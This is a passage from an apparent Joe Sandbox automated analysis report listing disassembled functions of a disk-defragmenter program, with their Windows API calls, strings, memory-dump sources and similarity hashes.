                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateCriticalDriveDrivesEnterInitializeInstanceLogicalSectionTypeUninitialize
                                                                                                                                                                                                                                                                                                • String ID: C:\
                                                                                                                                                                                                                                                                                                • API String ID: 2354564324-3404278061
                                                                                                                                                                                                                                                                                                • Opcode ID: 463b7e134fd02c2dffb61464138cf62a3387c166cfc111da7965f15e78b5fef1
                                                                                                                                                                                                                                                                                                • Instruction ID: c90efa92af71126dba6429048660511b38e7c0dbb77debf846213f4ca3b284e1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 463b7e134fd02c2dffb61464138cf62a3387c166cfc111da7965f15e78b5fef1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A518971A187519FC314DF29D881A5BBBE4FF88714F804A2EF899C7390D734A904CB8A
                                                                                                                                                                                                                                                                                                Function 00430EA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00430FF8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • DefragFinishRingtone, xrefs: 0043102A
                                                                                                                                                                                                                                                                                                • DiskDefrag\Setting Option\Gereral, xrefs: 0043102F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: DefragFinishRingtone$DiskDefrag\Setting Option\Gereral
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1318132366
                                                                                                                                                                                                                                                                                                • Opcode ID: 611e42f2e74a1490c92c656b9c1f4233f09f845737786cc1f03fb69b9647b0cb
                                                                                                                                                                                                                                                                                                • Instruction ID: 0a2994e761213e214e5a4d6a869241ea1e3b325438042f93d97e0811baed8686
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 611e42f2e74a1490c92c656b9c1f4233f09f845737786cc1f03fb69b9647b0cb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE41717074820566EA30B7725D23BAF21489F1CB98F00562FFA19953C2FBEDD885859F
                                                                                                                                                                                                                                                                                                Function 00504870 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Catch
                                                                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                                • API String ID: 78271584-2084237596
                                                                                                                                                                                                                                                                                                • Opcode ID: 60d334a2babda9015152320fb1b56685fe8a5b2565357ad46f9000524526b17b
                                                                                                                                                                                                                                                                                                • Instruction ID: 7f3e499a65fa1b5ee95370a69dc2f62e8b798b9dea4c67a4a9596effe2b86ecb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60d334a2babda9015152320fb1b56685fe8a5b2565357ad46f9000524526b17b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 754159B1900209AFCF15DF98CD85AEEBFB5BF48304F1485A9FA04A6291D335AD60DF50
                                                                                                                                                                                                                                                                                                Function 00422C50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422CFC
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                                • String ID: DiskChecked$DiskDefrag
                                                                                                                                                                                                                                                                                                • API String ID: 142774367-2981518532
                                                                                                                                                                                                                                                                                                • Opcode ID: ab5195b4a4bfda73d4f9f3e8bf5c99e646ac860a453a11dc9c20344d76e4ff99
                                                                                                                                                                                                                                                                                                • Instruction ID: c399ede082bf33e8358967d7bf4ff09710be0966645c3ad0fdc692b3c116348a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab5195b4a4bfda73d4f9f3e8bf5c99e646ac860a453a11dc9c20344d76e4ff99
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE21B1726003189BC728EE1DDD85BDAB7A0AF84700F90452DFE158F282DBB4AA04C798
                                                                                                                                                                                                                                                                                                Function 00507C97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ~P
                                                                                                                                                                                                                                                                                                • API String ID: 0-500931198
                                                                                                                                                                                                                                                                                                • Opcode ID: af959c50f9ceb22731f565f3fb959b59621721a55135329773564823bcb7b730
                                                                                                                                                                                                                                                                                                • Instruction ID: 3f53a812ee88c614be39cb66f25ae1a6b01f6845a1ee28e41b72ee3cff38c9b7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af959c50f9ceb22731f565f3fb959b59621721a55135329773564823bcb7b730
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62215E72A0820AAFDB10AF619C45A7E7FA9FF493647108525F915971D1D730FC5097A0
                                                                                                                                                                                                                                                                                                Function 0041DDE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetVolumeNameForVolumeMountPointW.KERNEL32(?,00000000), ref: 0041DE53
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Volume$MountNamePoint
                                                                                                                                                                                                                                                                                                • String ID: C:\$DiskDefrag\SSD
                                                                                                                                                                                                                                                                                                • API String ID: 1269602640-2872339364
                                                                                                                                                                                                                                                                                                • Opcode ID: cc76f1b3ff457465d13abcf68c2bcec90b57b123ad2d10895c62ec857d4069d2
                                                                                                                                                                                                                                                                                                • Instruction ID: c621563c8422bd9a998db8b3ae63383a0df01fc5d31629062189869ad5b1e679
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc76f1b3ff457465d13abcf68c2bcec90b57b123ad2d10895c62ec857d4069d2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16316AB1908701AFC314DF64DD85B5ABBE4FB88710F00492EF94A97290E735E948CB9A
                                                                                                                                                                                                                                                                                                Function 004320A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00432180: SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00432180: SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,?,00000000), ref: 00432160
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag\Setting Option\Optimize$cbbFileSize
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-4101677200
                                                                                                                                                                                                                                                                                                • Opcode ID: 5d012cc000ad30419fbe295ad9283da05f428964ef3f062ec2218de17c19c3bd
                                                                                                                                                                                                                                                                                                • Instruction ID: c484c337b78f61a7d82ad98e4e7a9c8d2f838ff1f30f5547f561464bca46b6c3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d012cc000ad30419fbe295ad9283da05f428964ef3f062ec2218de17c19c3bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 530121707D021A2BEA147E7A8D93FBE01498B85B08F00993E760BDE2C7CDDD8D484229
                                                                                                                                                                                                                                                                                                Function 0041DF00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetVolumeNameForVolumeMountPointW.KERNEL32(?,00000000), ref: 0041DF73
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Volume$MountNamePoint
                                                                                                                                                                                                                                                                                                • String ID: C:\$DiskDefrag\SSD
                                                                                                                                                                                                                                                                                                • API String ID: 1269602640-2872339364
                                                                                                                                                                                                                                                                                                • Opcode ID: 7bf0067fdc715ad62ea400fca28faee1260d6c25cd8764403d7545c4f3a7dbe9
                                                                                                                                                                                                                                                                                                • Instruction ID: 5d073b895f258575d86a17cdac6f59c45116d1a3496c0b5e65ce3dbb7a15869e
